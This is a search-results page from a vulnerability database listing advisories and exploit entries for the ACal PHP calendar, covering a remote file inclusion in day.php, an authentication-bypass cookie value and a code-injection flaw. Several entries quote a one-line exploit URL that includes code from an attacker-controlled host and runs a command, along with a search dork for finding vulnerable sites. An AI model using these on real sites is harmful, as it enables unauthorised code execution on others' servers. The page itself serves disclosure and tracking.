Lucene search
+L

40 matches found

securityvulns
securityvulns
added 2007/05/19 12:00 a.m.64 views

ACal Web Calendar 2.2.6 Remote File Include Vulnerabilities

ACal Web Calendar 2.2.6 Remote File Include Vulnerabilities Author : BoZKuRTSeRDaR Contact MSN:[email protected] My Homepage :WwW.Turkmilliyetcileri.OrG script Download : http://sourceforge.net/project/showfiles.php?groupid=105617 exploit:...

0.8AI score
SaveExploits0
Tenable Nessus
Tenable Nessus
added 2006/05/15 12:00 a.m.872 views

ACal embed/day.php path Parameter Remote File Inclusion

The remote host is running ACal, an open source, web-based event calendar written in PHP. The version of ACal installed on the remote host fails to sanitize user-supplied input to the 'path' parameter of the 'embed/day.php' script before using it in PHP 'include' functions. Provided PHP's...

7.5CVSS6.1AI score0.03248EPSS
SaveExploits2References1
NVD
NVD
added 2006/05/09 10:02 a.m.25 views

CVE-2006-2261

PHP remote file inclusion vulnerability in day.php in ACal 2.2.6 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

7.5CVSS7.5AI score0.03248EPSS
SaveExploits2References6
Prion
Prion
added 2006/05/09 10:02 a.m.22 views

Remote file inclusion

PHP remote file inclusion vulnerability in day.php in ACal 2.2.6 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

7.5CVSS7.7AI score0.03248EPSS
SaveExploits2References6Affected Software1
CVE
CVE
added 2006/05/09 10:00 a.m.84 views

CVE-2006-2261

CVE-2006-2261 affects ACal 2.2.6. The embed/day.php script does not sanitize the path parameter before using it in PHP include(), enabling a remote file inclusion that can allow arbitrary PHP code execution if PHP register_globals is enabled; the exact exploit details are not provided in the docu...

7.5CVSS7.5AI score0.03248EPSS
SaveExploits2References6Affected Software1
Cvelist
Cvelist
added 2006/05/09 10:00 a.m.43 views

CVE-2006-2261

PHP remote file inclusion vulnerability in day.php in ACal 2.2.6 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

7.5AI score0.03248EPSS
SaveExploits2References6
seebug.org
seebug.org
added 2006/05/07 12:00 a.m.22 views

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

No description provided by source. $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2006/05/07 12:00 a.m.66 views

ACal 2.2.6 - day.php Remote File Inclusion

ACal 2.2.6 - day.php Remote File Inclusion $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit:...

0.2AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/05/07 12:00 a.m.52 views

ACal 2.2.6 - 'day.php' Remote File Inclusion

$$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...

7.5CVSS5.8AI score0.03248EPSS
SaveExploits2
zdt
zdt
added 2006/05/07 12:00 a.m.230 views

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications =========================================================== ACal = 2.2.6 day.php Remote File Inclusion Vulnerability =========================================================== $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL:...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2006/01/13 12:00 a.m.50 views

[eVuln] ACal Authentication Bypass &amp; PHP Code Insertion

New eVuln Advisory: ACal Authentication Bypass & PHP Code Insertion --------------------Summary---------------- Software: ACal Sowtware's Web Site: http://acalproj.sourceforge.net/ Versions: 2.2.5 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Availabl...

1.5AI score
SaveExploits0
CVE
CVE
added 2006/01/12 11:00 a.m.60 views

CVE-2006-0182

CVE-2006-0182 affects ACal Calendar Project 2.2.5. The vulnerability in login.php allows remote bypass of authentication by setting the ACalAuthenticate cookie to the literal value “inside,” enabling unauthorized access. Relatedly, CVE-2006-0183 in edit.php permits authenticated users to execute ...

7.5CVSS6.8AI score0.01908EPSS
SaveExploits0References7Affected Software1
CVE
CVE
added 2006/01/12 11:00 a.m.68 views

CVE-2006-0183

The CVE-2006-0183 entry concerns ACal Calendar Project 2.2.5. It describes a direct static code injection vulnerability in edit.php that allows authenticated users to execute arbitrary PHP code by supplying values for edit=header (modifying header.php) or edit=footer (modifying footer.php). This ...

6.5CVSS7.5AI score0.01323EPSS
SaveExploits0References7Affected Software1
Cvelist
Cvelist
added 2006/01/12 11:00 a.m.40 views

CVE-2006-0182

login.php in ACal Calendar Project 2.2.5 allows remote attackers to bypass authentication by setting the ACalAuthenticate cookie variable to "inside"...

6.8AI score0.01908EPSS
SaveExploits0References7
Cvelist
Cvelist
added 2006/01/12 11:00 a.m.43 views

CVE-2006-0183

Direct static code injection vulnerability in edit.php in ACal Calendar Project 2.2.5 allows authenticated users to execute arbitrary PHP code via 1 the edit=header value, which modifies header.php, or 2 the edit=footer value, which modifies footer.php. NOTE: this issue might be resultant from th...

7.4AI score0.01323EPSS
SaveExploits0References7
NVD
NVD
added 2006/01/12 6:02 a.m.23 views

CVE-2006-0182

login.php in ACal Calendar Project 2.2.5 allows remote attackers to bypass authentication by setting the ACalAuthenticate cookie variable to "inside"...

7.5CVSS6.8AI score0.01908EPSS
SaveExploits0References7
Prion
Prion
added 2006/01/12 6:02 a.m.29 views

Authentication flaw

login.php in ACal Calendar Project 2.2.5 allows remote attackers to bypass authentication by setting the ACalAuthenticate cookie variable to "inside"...

7.5CVSS7.1AI score0.01908EPSS
SaveExploits0References7Affected Software1
Prion
Prion
added 2006/01/12 6:02 a.m.27 views

Code injection

Direct static code injection vulnerability in edit.php in ACal Calendar Project 2.2.5 allows authenticated users to execute arbitrary PHP code via 1 the edit=header value, which modifies header.php, or 2 the edit=footer value, which modifies footer.php. NOTE: this issue might be resultant from th...

6.5CVSS7.7AI score0.01908EPSS
SaveExploits0References7Affected Software1
NVD
NVD
added 2006/01/12 6:02 a.m.31 views

CVE-2006-0183

Direct static code injection vulnerability in edit.php in ACal Calendar Project 2.2.5 allows authenticated users to execute arbitrary PHP code via 1 the edit=header value, which modifies header.php, or 2 the edit=footer value, which modifies footer.php. NOTE: this issue might be resultant from th...

6.5CVSS7.4AI score0.01323EPSS
SaveExploits0References7
securityvulns
securityvulns
added 2006/01/12 12:00 a.m.46 views

[SA18432] ACal &quot;ACalAuthenticate&quot; Authentication Bypass Vulnerability

TITLE: ACal "ACalAuthenticate" Authentication Bypass Vulnerability SECUNIA ADVISORY ID: SA18432 VERIFY ADVISORY: http://secunia.com/advisories/18432/ CRITICAL: Highly critical IMPACT: Security Bypass, System access WHERE: From remote SOFTWARE: ACal 2.x http://secunia.com/product/3884/ DESCRIPTION...

1AI score
SaveExploits0
Rows per page
Query Builder